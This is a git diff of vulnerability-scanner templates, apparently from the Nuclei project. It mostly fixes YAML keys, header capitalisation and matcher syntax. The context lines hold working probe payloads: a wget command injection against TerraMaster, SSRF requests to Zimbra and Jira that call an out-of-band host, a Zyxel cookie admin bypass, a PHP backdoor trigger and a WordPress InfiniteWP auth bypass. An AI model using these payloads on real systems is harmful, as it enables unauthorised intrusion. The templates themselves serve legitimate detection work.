diff --git a/cves/2019/CVE-2019-0193.yaml b/cves/2019/CVE-2019-0193.yaml index 77a2a57b9d..d367f5e9a6 100644 --- a/cves/2019/CVE-2019-0193.yaml +++ b/cves/2019/CVE-2019-0193.yaml @@ -5,7 +5,7 @@ info: description: In Apache Solr, the DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the whole DIH configuration can come from a request's "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk. Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property "enable.dih.dataConfigParam" to true. author: pdteam severity: critical - refrense: | + reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-0193 - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193 - https://paper.seebug.org/1009/ diff --git a/cves/2019/CVE-2019-8451.yaml b/cves/2019/CVE-2019-8451.yaml index abdacb5528..c13e0e6df5 100644 --- a/cves/2019/CVE-2019-8451.yaml +++ b/cves/2019/CVE-2019-8451.yaml @@ -20,7 +20,7 @@ requests: url=https://{{Hostname}}:443@{{interactsh-url}} headers: - X-Atlassian-token: no-check + X-Atlassian-Token: no-check Content-Type: application/x-www-form-urlencoded matchers: diff --git a/cves/2020/CVE-2020-28188.yaml b/cves/2020/CVE-2020-28188.yaml index 2bf5ae0888..a4d926f2a5 100644 --- a/cves/2020/CVE-2020-28188.yaml +++ b/cves/2020/CVE-2020-28188.yaml @@ -16,14 +16,14 @@ requests: - | GET /include/makecvs.php?Event=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1 Host: {{Hostname}} - User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive GET /tos/index.php?explorer/pathList&path=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1 Host: {{Hostname}} - User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive diff --git a/cves/2020/CVE-2020-7796.yaml b/cves/2020/CVE-2020-7796.yaml index 6f02ee6688..70fc14a6ca 100644 --- a/cves/2020/CVE-2020-7796.yaml +++ b/cves/2020/CVE-2020-7796.yaml @@ -5,7 +5,7 @@ info: author: gy741 severity: critical description: Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 allows SSRF when WebEx zimlet is installed and zimlet JSP is enabled. - reference: | + reference: - https://www.adminxe.com/2183.html tags: cve,cve2020,zimbra,ssrf,oob @@ -14,7 +14,7 @@ requests: - | GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://{{interactsh-url}}%23 HTTP/1.1 Host: {{Hostname}} - User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* diff --git a/cves/2021/CVE-2021-3297.yaml b/cves/2021/CVE-2021-3297.yaml index dd73110c6d..383ea4d3fe 100644 --- a/cves/2021/CVE-2021-3297.yaml +++ b/cves/2021/CVE-2021-3297.yaml @@ -4,7 +4,7 @@ info: description: On Zyxel NBG2105 V1.00(AAGU.2)C0 devices, setting the login cookie to 1 provides administrator access. author: gy741 severity: high - reference: | + reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-3297 - https://github.com/nieldk/vulnerabilities/blob/main/zyxel%20nbg2105/Admin%20bypass tags: cve,cve2021,zyxel,auth-bypass,router @@ -18,7 +18,7 @@ requests: Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive - cookie: language=en; login=1 + Cookie: language=en; login=1 matchers-condition: and matchers: diff --git a/network/cisco-smi-exposure.yaml b/network/cisco-smi-exposure.yaml index 438ecd7920..212bbf0f1b 100644 --- a/network/cisco-smi-exposure.yaml +++ b/network/cisco-smi-exposure.yaml @@ -9,7 +9,7 @@ info: connecting to the specified Cisco Smart Install port and determines if it speaks the Smart Install Protocol. Exposure of SMI to untrusted networks can allow complete compromise of the switch. - references: | + reference: - https://blog.talosintelligence.com/2017/02/cisco-coverage-for-smart-install-client.html - https://blogs.cisco.com/security/cisco-psirt-mitigating-and-detecting-potential-abuse-of-cisco-smart-install-feature - https://tools.cisco.com/security/center/content/CiscoSecurityResponse/cisco-sr-20170214-smi diff --git a/technologies/mautic-crm-detect.yaml b/technologies/mautic-crm-detect.yaml index 42d0c4df6f..9d2f535e1d 100644 --- a/technologies/mautic-crm-detect.yaml +++ b/technologies/mautic-crm-detect.yaml @@ -14,7 +14,7 @@ requests: path: - "{{BaseURL}}/s/login" - matcherscondition: or + matchers-condition: or matchers: - type: word part: body diff --git a/technologies/sap-web-dispatcher-admin-portal.yaml b/technologies/sap-web-dispatcher-admin-portal.yaml index c403098fb1..f6f7c62464 100644 --- a/technologies/sap-web-dispatcher-admin-portal.yaml +++ b/technologies/sap-web-dispatcher-admin-portal.yaml @@ -19,20 +19,20 @@ requests: matchers: - type: word part: header - conditions: or + condition: or words: - "Basic realm=\"WEB ADMIN\"" - "SAP NetWeaver Application Server" - type: status - conditions: or + condition: or status: - 401 - 200 - type: word part: body - conditions: or + condition: or words: - "SAP Web Dispatcher" - "Administration" \ No newline at end of file diff --git a/vulnerabilities/other/php-zerodium-backdoor-rce.yaml b/vulnerabilities/other/php-zerodium-backdoor-rce.yaml index 469a6fa8b1..9c2df26245 100644 --- a/vulnerabilities/other/php-zerodium-backdoor-rce.yaml +++ b/vulnerabilities/other/php-zerodium-backdoor-rce.yaml @@ -12,7 +12,7 @@ requests: path: - "{{BaseURL}}" headers: - User-Agentt: zerodiumvar_dump(233*233); + User-Agent: zerodiumvar_dump(233*233); matchers-condition: and matchers: diff --git a/vulnerabilities/other/sick-beard-xss.yaml b/vulnerabilities/other/sick-beard-xss.yaml index a384753cdb..51b5a3253c 100644 --- a/vulnerabilities/other/sick-beard-xss.yaml +++ b/vulnerabilities/other/sick-beard-xss.yaml @@ -8,7 +8,7 @@ info: reference: - https://sickbeard.com/ # vendor homepage - https://github.com/midgetspy/Sick-Beard # software link - customAttributes: + additional-fields: shodan-dork: sickbeard requests: diff --git a/vulnerabilities/other/zimbra-preauth-ssrf.yaml b/vulnerabilities/other/zimbra-preauth-ssrf.yaml index 4b700e84a1..a67e1f1177 100644 --- a/vulnerabilities/other/zimbra-preauth-ssrf.yaml +++ b/vulnerabilities/other/zimbra-preauth-ssrf.yaml @@ -4,7 +4,7 @@ info: name: Zimbra Collaboration Suite (ZCS) - SSRF author: gy741 severity: critical - reference: | + reference: - https://www.adminxe.com/2183.html tags: zimbra,ssrf,oob @@ -13,7 +13,7 @@ requests: - | GET /service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://{{interactsh-url}}%23.salesforce.com/ HTTP/1.1 Host: {{Hostname}} - User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive diff --git a/vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml b/vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml index c51387653c..1f8a3bb2db 100644 --- a/vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml +++ b/vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml @@ -29,7 +29,6 @@ requests: Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded - ContentLength: 3537 _IWP_JSON_PREFIX_{{base64("{\"iwp_action\":\"add_site\",\"params\":{\"username\":\"§username§\"}}")}}